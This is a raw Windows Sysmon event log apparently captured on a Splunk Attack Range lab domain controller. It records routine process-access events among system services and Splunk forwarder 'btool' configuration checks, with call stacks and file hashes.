08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001956Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-169F-5F84-0500-000000007F01}648796C:\Windows\system32\csrss.exe{5D479F2C-16B5-5F84-5600-000000007F01}2276C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001955Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16B5-5F84-5500-000000007F01}25242428C:\Windows\system32\cmd.exe{5D479F2C-16B5-5F84-5600-000000007F01}2276C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001954Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.806{5D479F2C-16B5-5F84-5600-000000007F01}2276C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5D479F2C-16B5-5F84-5500-000000007F01}2524C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list general --no-log 10341000x80000000000000001953Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16B2-5F84-3A00-000000007F01}37963816C:\Windows\system32\conhost.exe{5D479F2C-16B5-5F84-5500-000000007F01}2524C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001952Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001951Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001950Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001949Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001948Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001947Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001946Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001945Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001944Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001943Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-169F-5F84-0500-000000007F01}6481156C:\Windows\system32\csrss.exe{5D479F2C-16B5-5F84-5500-000000007F01}2524C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000001942Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.793{5D479F2C-16B3-5F84-4800-000000007F01}32842912C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5D479F2C-16B5-5F84-5500-000000007F01}2524C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18319|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000001941Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.802{5D479F2C-16B5-5F84-5500-000000007F01}2524C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-169F-5F84-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-16B3-5F84-4800-000000007F01}3284C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001940Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.777{5D479F2C-16B5-5F84-5400-000000007F01}40564052C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{5D479F2C-16B1-5F84-3000-000000007F01}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001939Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.761{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001938Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.761{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001937Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.761{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001936Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.761{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001935Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.761{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001934Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.761{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001933Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.761{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001932Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.761{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2700-000000007F01}2024C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001931Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:25.605{5D479F2C-16A1-5F84-0C00-000000007F01}6121492C:\Windows\system32\svchost.exe{5D479F2C-16A1-5F84-1000-000000007F01}1144C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001930Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 